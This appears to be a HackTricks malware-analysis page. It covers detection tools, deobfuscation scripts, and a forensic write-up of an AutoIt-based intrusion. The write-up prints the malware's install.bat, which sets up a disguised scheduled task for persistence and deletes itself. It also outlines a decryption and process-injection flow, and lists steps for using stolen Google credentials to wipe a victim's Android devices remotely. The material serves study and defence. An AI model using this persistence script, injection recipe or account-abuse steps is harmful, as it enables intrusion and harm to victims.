Malware Analysis

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Forensics CheatSheets

https://www.jaiminton.com/cheatsheet/DFIR/#

Online Services

Offline Antivirus and Detection Tools

Yara

Install

sudo apt-get install -y yara

Prepare rules

Use this script to download and merge all the yara malware rules from github: https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9
Create the rules directory and execute it. This will create a file called malware_rules.yar which contains all the yara rules for malware.

wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py

Scan

yara -w malware_rules.yar image  #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder

yarGen: Check for malware and Create rules

You can use the tool yarGen to generate yara rules from a binary. Check out these tutorials: Part 1, Part 2, Part 3

python3 yarGen.py --update
python3 yarGen.py --excludegood -m ../../mals/

ClamAV

Install

sudo apt-get install -y clamav

Scan

sudo freshclam      #Update rules
clamscan filepath   #Scan 1 file
clamscan folderpath #Scan the whole folder

Capa

Capa detects potentially malicious capabilities in executables (PE, ELF, .NET). It reports ATT&CK tactics as well as suspicious capabilities such as:

  • check for OutputDebugString error
  • run as a service
  • create process

Get it in the GitHub repo.

IOCs

IOC stands for Indicator of Compromise. An IOC is a set of conditions that identifies potentially unwanted software or confirmed malware. Blue Teams use these definitions to search for malicious files in their systems and networks.
Sharing these definitions is very useful: once malware is identified on a computer and an IOC is created for it, other Blue Teams can use that IOC to identify the malware faster.

A tool to create or modify IOCs is IOC Editor.
You can use tools such as Redline to search for defined IOCs in a device.

Loki

Loki is a scanner for Simple Indicators of Compromise.
Detection is based on four detection methods:

1. File Name IOC
   Regex match on full file path/name

2. Yara Rule Check
   Yara signature matches on file data and process memory

3. Hash Check
   Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files

4. C2 Back Connect Check
   Compares process connection endpoints with C2 IOCs (new since version v.10)
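
The file name and hash checks are simple enough to sketch in a few lines. The following is a minimal illustration of the idea, not Loki's actual implementation; the function name check_file, the pattern list, and the hash set are hypothetical inputs chosen for the example.

```python
import hashlib
import re

def check_file(path, data, name_patterns, bad_hashes):
    """Return a list of reasons why this file matches an IOC (empty if none)."""
    hits = []
    # File Name IOC: regex match on the full path
    for pattern in name_patterns:
        if re.search(pattern, path, re.IGNORECASE):
            hits.append("filename:" + pattern)
    # Hash Check: compare MD5/SHA1/SHA256 of the content with known-bad hashes
    for algo in ("md5", "sha1", "sha256"):
        digest = hashlib.new(algo, data).hexdigest()
        if digest in bad_hashes:
            hits.append(algo + ":" + digest)
    return hits
```

In practice the patterns and hashes would come from shared IOC feeds rather than being hard-coded.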

Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.

rkhunter

Tools like rkhunter can be used to check the filesystem for possible rootkits and malware.

sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]

FLOSS

FLOSS is a tool that will try to find obfuscated strings inside executables using different techniques.

PEpper

PEpper checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).

PEstudio

PEstudio extracts information from Windows executables, such as imports, exports, and headers. It also checks VirusTotal and flags potential ATT&CK techniques.

Detect It Easy(DiE)

DiE is a tool to detect if a file is encrypted and also find packers.

NeoPI

NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code.
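
Two statistics commonly used for this kind of detection are Shannon entropy and the length of the longest unbroken token. The sketch below illustrates the general idea and is not taken from NeoPI's code; the function names are hypothetical.

```python
import math
import re
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

def longest_token(data: bytes) -> int:
    """Length of the longest run of non-whitespace bytes (long runs hint at encoded blobs)."""
    return max((len(tok) for tok in re.findall(rb"\S+", data)), default=0)
```

Neither value is conclusive on its own; ranking the files of a web root by each metric and reviewing the outliers is usually more useful than a fixed threshold.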

php-malware-finder

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells.

Apple Binary Signatures

When analysing a malware sample, always check the signature of the binary, as the developer who signed it may already be associated with malware.

#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"

#Check if the app’s contents have been modified
codesign --verify --verbose /Applications/Safari.app

#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app

Detection Techniques

File Stacking

If you know the date on which a folder containing the files of a web server was last updated, check the creation and modification dates of all the files in the web server. If any date is suspicious, inspect that file.
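
A minimal sketch of this check, assuming the last legitimate update time is known as a Unix timestamp. It looks only at modification times, because creation time is not exposed portably. The function names are hypothetical.

```python
import os

def stat_tree(root):
    """Yield (path, mtime) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            yield path, os.stat(path).st_mtime

def modified_after(entries, last_update, tolerance=0.0):
    """Return (path, mtime) pairs newer than the known update time, newest first."""
    late = [(p, t) for p, t in entries if t > last_update + tolerance]
    return sorted(late, key=lambda item: item[1], reverse=True)
```

For example, modified_after(stat_tree("/var/www"), deploy_ts) would list every file touched after the deployment, where "/var/www" and deploy_ts are placeholders. Timestamps can be forged, so an empty result does not prove the folder is clean.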

Baselines

If the files of a folder shouldn’t have been modified, you can calculate the hash of the original files of the folder and compare them with the current ones. Anything modified will be suspicious.
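
The comparison can be sketched as follows, assuming SHA-256 as the hash and a baseline captured while the folder was known to be good. The function names are hypothetical.

```python
import hashlib
import os

def hash_tree(root):
    """Map each file's path (relative to root) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root)] = h.hexdigest()
    return digests

def diff_baseline(baseline, current):
    """Compare two {path: digest} maps and report what changed."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }
```

Store the baseline somewhere the attacker cannot write to, otherwise it can be regenerated after the tampering.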

Statistical Analysis

When the information is saved in logs, you can compute statistics such as how many times each file of a web server was requested, since a web shell may be one of the most requested files.
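
A rough sketch of such a count, assuming the access log uses the Common Log Format (client IP first, request line in double quotes). The regular expression and the function name are illustrative assumptions and will need adjusting for other log layouts.

```python
import re
from collections import Counter, defaultdict

# Assumed layout: IP ident user [timestamp] "METHOD /path HTTP/x.y" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)')

def request_stats(lines):
    """Return (hits per path, number of distinct client IPs per path)."""
    hits = Counter()
    clients = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, _method, target = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        hits[path] += 1
        clients[path].add(ip)
    return hits, {p: len(ips) for p, ips in clients.items()}
```

hits.most_common(20) gives the most requested paths; a path with many hits from very few distinct clients is also worth a closer look.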


Android in-app native telemetry (no root)

On Android, you can instrument native code inside the target app process by preloading a tiny logger library before other JNI libs initialize. This gives early visibility into native behavior without system-wide hooks or root. A popular approach is SoTap: drop libsotap.so for the right ABI into the APK and inject a System.loadLibrary("sotap") call early (e.g., static initializer or Application.onCreate), then collect logs from internal/external paths or Logcat fallback.

See the Android native reversing page for setup details and log paths:

Reversing Native Libraries


Android/JNI native string deobfuscation with angr + Ghidra

Some Android malware and RASP-protected apps hide JNI method names and signatures by decoding them at runtime before calling RegisterNatives. When Frida/ptrace instrumentation is killed by anti-debug, you can still recover the plaintext offline by executing the in-binary decoder with angr and then pushing results back into Ghidra as comments.

Key idea: treat the decoder inside the .so as a callable function, execute it on the obfuscated byte blobs in .rodata, and concretize the output bytes up to the first \x00 (C-string terminator). Keep angr and Ghidra using the same image base to avoid address mismatches.

Workflow overview

  • Triage in Ghidra: identify the decoder and its calling convention/arguments in JNI_OnLoad and RegisterNatives setup.
  • Run angr (CPython3) to execute the decoder for each target string and dump results.
  • Annotate in Ghidra: auto-comment decoded strings at each call site for fast JNI reconstruction.

Ghidra triage (JNI_OnLoad pattern)

  • Apply JNI datatypes to JNI_OnLoad so Ghidra recognises JNINativeMethod structures.

  • Typical JNINativeMethod per Oracle docs:

    typedef struct {
        char *name;      // e.g., "nativeFoo"
        char *signature; // e.g., "()V", "()[B"
        void *fnPtr;     // native implementation address
    } JNINativeMethod;
    
  • Look for calls to RegisterNatives. If the library constructs the name/signature with a local routine (e.g., FUN_00100e10) that references a static byte table (e.g., DAT_00100bf4) and takes parameters like (encoded_ptr, out_buf, length), that is an ideal target for offline execution.

angr setup (execute the decoder offline)

  • Load the .so with the same base used in Ghidra (example: 0x00100000) and disable auto-loading of external libs to keep the state small.
angr setup and offline decoder execution
import angr, json

project = angr.Project(
    '/path/to/libtarget.so',
    load_options={'main_opts': {'base_addr': 0x00100000}},
    auto_load_libs=False,
)

ENCODING_FUNC_ADDR = 0x00100e10  # decoder function discovered in Ghidra

def decode_string(enc_addr, length):
    # fresh blank state per evaluation
    st = project.factory.blank_state()
    outbuf = st.heap.allocate(length)
    call = project.factory.callable(ENCODING_FUNC_ADDR, base_state=st)
    ret_ptr = call(enc_addr, outbuf, length)  # returns outbuf pointer
    rs = call.result_state
    raw = rs.solver.eval(rs.memory.load(ret_ptr, length), cast_to=bytes)
    return raw.split(b'\x00', 1)[0].decode('utf-8', errors='ignore')

# Example: decode a JNI signature at 0x100933 of length 5 → should be ()[B
print(decode_string(0x00100933, 5))
  • At scale, build a static map of call sites to the decoder’s arguments (encoded_ptr, size). Wrappers may hide arguments, so you may create this mapping manually from Ghidra xrefs if API recovery is noisy.
Batch decode multiple call sites with angr
# call_site -> (encoded_addr, size)
call_site_args_map = {
    0x00100f8c: (0x00100b81, 0x41),
    0x00100fa8: (0x00100bca, 0x04),
    0x00100fcc: (0x001007a0, 0x41),
    0x00100fe8: (0x00100933, 0x05),
    0x0010100c: (0x00100c62, 0x41),
    0x00101028: (0x00100c15, 0x16),
    0x00101050: (0x00100a49, 0x101),
    0x00100cf4: (0x00100821, 0x11),
    0x00101170: (0x00100940, 0x101),
    0x001011cc: (0x0010084e, 0x13),
    0x00101334: (0x001007e9, 0x0f),
    0x00101478: (0x0010087d, 0x15),
    0x001014f8: (0x00100800, 0x19),
    0x001015e8: (0x001008e6, 0x27),
    0x0010160c: (0x00100c33, 0x13),
}

decoded_map = { hex(cs): decode_string(enc, sz)
                for cs, (enc, sz) in call_site_args_map.items() }

import json
print(json.dumps(decoded_map, indent=2))
with open('decoded_strings.json', 'w') as f:
    json.dump(decoded_map, f, indent=2)

Annotate call sites in Ghidra

Option A: Jython-only comment writer (use a pre-computed JSON)

  • Since angr requires CPython3, keep deobfuscation and annotation separated. First run the angr script above to produce decoded_strings.json. Then run this Jython GhidraScript to write PRE_COMMENTs at each call site (and include the caller function name for context):
Ghidra Jython script to annotate decoded JNI strings
#@category Android/Deobfuscation
# Jython in Ghidra 10/11
import json
from ghidra.program.model.listing import CodeUnit

# Ask for the JSON produced by the angr script
f = askFile('Select decoded_strings.json', 'Load')
mapping = json.load(open(f.absolutePath, 'r'))  # keys as hex strings

fm = currentProgram.getFunctionManager()
rm = currentProgram.getReferenceManager()

# Replace with your decoder address to locate call-xrefs (optional)
ENCODING_FUNC_ADDR = 0x00100e10
enc_addr = toAddr(ENCODING_FUNC_ADDR)

callsite_to_fn = {}
for ref in rm.getReferencesTo(enc_addr):
    if ref.getReferenceType().isCall():
        from_addr = ref.getFromAddress()
        fn = fm.getFunctionContaining(from_addr)
        if fn:
            callsite_to_fn[from_addr.getOffset()] = fn.getName()

# Write comments from JSON
for k_hex, s in mapping.items():
    cs = int(k_hex, 16)
    site = toAddr(cs)
    caller = callsite_to_fn.get(cs, None)
    text = s if caller is None else '%s @ %s' % (s, caller)
    currentProgram.getListing().setComment(site, CodeUnit.PRE_COMMENT, text)
print('[+] Annotated %d call sites' % len(mapping))

Option B: Single CPython script via pyhidra/ghidra_bridge

  • Alternatively, use pyhidra or ghidra_bridge to drive Ghidra’s API from the same CPython process running angr. This allows calling decode_string() and immediately setting PRE_COMMENTs without an intermediate file. The logic mirrors the Jython script: build callsite→function map via ReferenceManager, decode with angr, and set comments.

Why this works and when to use it

  • Offline execution sidesteps RASP/anti-debug: no ptrace, no Frida hooks required to recover strings.
  • Keeping Ghidra and angr base_addr aligned (e.g., 0x00100000) ensures that function/data addresses match across tools.
  • Repeatable recipe for decoders: treat the transform as a pure function, allocate an output buffer in a fresh state, call it with (encoded_ptr, out_ptr, len), then concretize via state.solver.eval and parse C-strings up to \x00.

Notes and pitfalls

  • Respect the target ABI/calling convention. angr.factory.callable picks one based on arch; if arguments look shifted, specify cc explicitly.
  • If the decoder expects zeroed output buffers, initialize outbuf with zeros in the state before the call.
  • For position-independent Android .so, always supply base_addr so addresses in angr match those seen in Ghidra.
  • Use currentProgram.getReferenceManager() to enumerate call-xrefs even if the app wraps the decoder behind thin stubs.

For angr basics, see: angr basics


Deobfuscating Dynamic Control-Flow (JMP/CALL RAX Dispatchers)

Modern malware families heavily abuse Control-Flow Graph (CFG) obfuscation: instead of a direct jump/call they compute the destination at run-time and execute a jmp rax or call rax. A small dispatcher (typically nine instructions) sets the final target depending on the CPU ZF/CF flags, completely breaking static CFG recovery.

The technique, showcased by the SLOW#TEMPEST loader, can be defeated with a short workflow that relies only on IDAPython and the Unicorn CPU emulator.

1. Locate every indirect jump / call

import idautils, idc

for ea in idautils.FuncItems(idc.here()):
    mnem = idc.print_insn_mnem(ea)
    if mnem in ("jmp", "call") and idc.print_operand(ea, 0) == "rax":
        print(f"[+] Dispatcher found @ {ea:X}")
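
Outside IDA, a rough first pass can be made on raw bytes, since jmp rax encodes as FF E0 and call rax as FF D0. The sketch below (hypothetical helper find_indirect_rax) does no disassembly, so it can report byte pairs that sit inside other instructions or data; treat its output as candidates to confirm in a disassembler.

```python
def find_indirect_rax(code: bytes, base: int = 0):
    """Return [(address, mnemonic)] for every FF E0 / FF D0 byte pair in code."""
    patterns = {b"\xff\xe0": "jmp rax", b"\xff\xd0": "call rax"}
    found = []
    for needle, name in patterns.items():
        pos = code.find(needle)
        while pos != -1:
            found.append((base + pos, name))
            pos = code.find(needle, pos + 1)
    return sorted(found)
```

Pass the section's load address as base so the reported addresses line up with the ones shown in IDA.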

2. Extract the dispatcher byte-code

import idc

def get_dispatcher_start(jmp_ea, count=9):
    # Walk back `count` instructions from the indirect jmp/call
    s = jmp_ea
    for _ in range(count):
        s = idc.prev_head(s, 0)
    return s

# jmp_ea: address of a `jmp rax` / `call rax` reported in step 1
start = get_dispatcher_start(jmp_ea)
size  = jmp_ea + idc.get_item_size(jmp_ea) - start
code  = idc.get_bytes(start, size)
with open(f"{start:X}.bin", "wb") as f:
    f.write(code)

3. Emulate it twice with Unicorn

from unicorn import *
from unicorn.x86_const import *

def run(code, zf=0, cf=0):
    BASE = 0x1000
    mu = Uc(UC_ARCH_X86, UC_MODE_64)
    mu.mem_map(BASE, 0x1000)
    mu.mem_write(BASE, code)
    mu.reg_write(UC_X86_REG_RFLAGS, (zf << 6) | cf)  # ZF is bit 6, CF is bit 0
    mu.reg_write(UC_X86_REG_RAX, 0)
    try:
        mu.emu_start(BASE, BASE + len(code))
    except UcError:
        # The final jmp/call rax normally faults on unmapped memory;
        # RAX already holds the computed target at that point.
        pass
    return mu.reg_read(UC_X86_REG_RAX)

Run run(code,0,0) and run(code,1,1) to obtain the false and true branch targets.

4. Patch back a direct jump / call

import struct, ida_bytes

def patch_direct(ea, target, is_call=False):
    op   = 0xE8 if is_call else 0xE9           # CALL rel32 or JMP rel32
    disp = (target - (ea + 5)) & 0xFFFFFFFF    # rel32 is relative to the next instruction
    ida_bytes.patch_bytes(ea, bytes([op]) + struct.pack('<I', disp))
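
The displacement arithmetic can be checked outside IDA. The helper below (hypothetical name encode_rel32) builds the same five bytes as a pure function and adds a range check.

```python
import struct

def encode_rel32(ea: int, target: int, is_call: bool = False) -> bytes:
    """Encode 'jmp target' or 'call target' as a 5-byte rel32 instruction placed at ea."""
    disp = target - (ea + 5)  # relative to the end of the 5-byte instruction
    if not -0x80000000 <= disp <= 0x7FFFFFFF:
        raise ValueError("target is out of rel32 range")
    opcode = 0xE8 if is_call else 0xE9
    return bytes([opcode]) + struct.pack("<i", disp)
```

Note that jmp rax and call rax are only two bytes long, so a five-byte patch written at the same address also overwrites the three bytes that follow; make sure those bytes are not needed before patching.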

After patching, force IDA to re-analyse the function so the full CFG and Hex-Rays output are restored:

import ida_auto, ida_funcs
ida_funcs.reanalyze_function(ida_funcs.get_func(ea))  # expects a func_t, not an address
ida_auto.auto_wait()                                  # wait until auto-analysis finishes

5. Label indirect API calls

Once the real destination of every call rax is known you can tell IDA what it is so parameter types & variable names are recovered automatically:

idc.set_callee_name(call_ea, resolved_addr, 0)  # IDA 8.3+

Practical benefits

  • Restores the real CFG → decompilation goes from 10 lines to thousands.
  • Enables string-cross-reference & xrefs, making behaviour reconstruction trivial.
  • Scripts are reusable: drop them into any loader protected by the same trick.

AutoIt-based loaders: .a3x decryption, Task Scheduler masquerade and RAT injection

This intrusion pattern chains a signed MSI, AutoIt loaders compiled to .a3x, and a Task Scheduler job masquerading as a benign app.

MSI → custom actions → AutoIt orchestrator

Process tree and commands executed by the MSI custom actions:

  • MsiExec.exe → cmd.exe to run install.bat
  • WScript.exe to show a decoy error dialog
%SystemRoot%\system32\cmd.exe /c %APPDATA%\스트레스 클리어\install.bat
%SystemRoot%\System32\WScript.exe %APPDATA%\스트레스 클리어\error.vbs

install.bat (drops loader, sets persistence, self-cleans):

@echo off
set dr=Music

copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe
copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3

cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe ^
  & hwpviewer /delete /tn "IoKlTr" /f ^
  & hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3"

del /f /q "%~dp0AutoIt3.exe"
del /f /q "%~dp0IoKlTr.au3"
del /f /q "%~f0"

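error.vbs (user decoy; the Korean text claims that the system and program language packs are incompatible and asks the user to install or switch to the Korean (Republic of Korea) language pack, under the title "Language pack error"):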

MsgBox "현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다." & vbCrLf & _
    "설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.", _
    vbCritical, "언어팩 오류"

Key artifacts and masquerade:

  • Drops AutoIt3.exe and IoKlTr.au3 to C:\Users\Public\Music
  • Copies schtasks.exe to hwpviewer.exe (masquerades as Hangul Word Processor viewer)
  • Creates a scheduled task “IoKlTr” that runs every 1 minute
  • Startup LNK seen as Smart_Web.lnk; mutex: Global\AB732E15-D8DD-87A1-7464-CE6698819E701
  • Stages modules under %APPDATA%\Google\Browser\ subfolders containing adb or adv and starts them via autoit.vbs/install.bat helpers

Forensic triage tips:

  • schtasks enumeration: schtasks /query /fo LIST /v | findstr /i "IoKlTr hwpviewer"
  • Look for renamed copies of schtasks.exe co-located with Task XML: dir /a "C:\Users\Public\Music\hwpviewer.exe"
  • Common paths: C:\Users\Public\Music\AutoIt3.exe, ...\IoKlTr.au3, Startup Smart_Web.lnk, %APPDATA%\Google\Browser\(adb|adv)*
  • Correlate process creation: AutoIt3.exe spawning legitimate Windows binaries (e.g., cleanmgr.exe, hncfinder.exe)
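
On hosts with many tasks, the same triage can be scripted over the output of schtasks /query /fo CSV /v. The sketch below assumes English column headers ("TaskName" and "Task To Run"), which differ on localized systems; the marker list is an illustrative assumption based on the artifacts above, and the function name is hypothetical.

```python
import csv
import io

# Markers derived from the artifacts listed above (lower-case for comparison)
SUSPICIOUS = ("autoit3.exe", ".a3x", ".au3", "\\users\\public\\")

def flag_tasks(csv_text):
    """Return (task name, command) pairs whose command contains a suspicious marker."""
    flagged = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        command = (row.get("Task To Run") or "").lower()
        if any(marker in command for marker in SUSPICIOUS):
            flagged.append((row.get("TaskName"), row.get("Task To Run")))
    return flagged
```

Feed it the saved command output, for example the contents of a file produced with schtasks /query /fo CSV /v > tasks.csv.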

AutoIt loaders and .a3x payload decryption → injection

  • AutoIt modules are compiled with #AutoIt3Wrapper_Outfile_type=a3x and decrypt embedded payloads before injecting into benign processes.
  • Observed families: QuasarRAT (injected into hncfinder.exe) and RftRAT/RFTServer (injected into cleanmgr.exe), as well as RemcosRAT modules (Remcos\RunBinary.a3x).
  • Decryption pattern: derive an AES key via HMAC, decrypt the embedded blob, then inject the plaintext module.

Generic decryption skeleton (exact HMAC input/algorithm is family-specific):

import hmac, hashlib
from Crypto.Cipher import AES

def derive_aes_key(secret: bytes, data: bytes) -> bytes:
    # Example: HMAC-SHA256 → first 16/32 bytes as AES key
    return hmac.new(secret, data, hashlib.sha256).digest()

def aes_decrypt_cbc(key: bytes, iv: bytes, ct: bytes) -> bytes:
    return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(ct)
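
Two details usually have to be settled per sample: how much of the HMAC digest is used as the key, and how the plaintext is padded. The helpers below are a sketch under the assumptions that the key is a truncated HMAC-SHA256 digest and that the padding is PKCS#7; neither is confirmed for any specific family, and the function names are hypothetical.

```python
import hashlib
import hmac

def derive_key(secret: bytes, data: bytes, key_len: int = 32) -> bytes:
    """HMAC-SHA256 digest truncated to an AES key length (16, 24 or 32 bytes)."""
    if key_len not in (16, 24, 32):
        raise ValueError("AES keys are 16, 24 or 32 bytes long")
    return hmac.new(secret, data, hashlib.sha256).digest()[:key_len]

def pkcs7_unpad(plaintext: bytes, block_size: int = 16) -> bytes:
    """Strip PKCS#7 padding, raising ValueError if it is malformed."""
    if not plaintext or len(plaintext) % block_size:
        raise ValueError("length is not a multiple of the block size")
    n = plaintext[-1]
    if not 1 <= n <= block_size or plaintext[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return plaintext[:-n]
```

A padding error after decryption is a quick signal that the key, IV, or mode guess is wrong.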

Common injection flow (CreateRemoteThread-style):

  • CreateProcess (suspended) of the target host (e.g., cleanmgr.exe)
  • VirtualAllocEx + WriteProcessMemory with decrypted module/shellcode
  • CreateRemoteThread or QueueUserAPC to execute payload

Hunting ideas

  • AutoIt3.exe parented by MsiExec.exe or WScript.exe spawning system utilities
  • Files with .a3x extensions or AutoIt script runners under public/user-writable paths
  • Suspicious scheduled tasks executing AutoIt3.exe or binaries not signed by Microsoft, with minute-level triggers

Account-takeover abuse of Android Find My Device (Find Hub)

During the Windows intrusion, operators used stolen Google credentials to repeatedly wipe the victim’s Android devices, suppressing notifications while they expanded access via the victim’s logged-in desktop messenger.

Operator steps (from a logged-in browser session):

  • Review Google Account → Security → Your devices; follow Find My Phone → Find Hub (https://www.google.com/android/find)
  • Select device → re-enter Google password → issue “Erase device” (factory reset); repeat to delay recovery
  • Optional: clear alert e-mails in the linked mailbox (e.g., Naver) to hide security notifications

AdaptixC2: Configuration Extraction and TTPs

See the dedicated page:

Adaptixc2 Config Extraction And Ttps
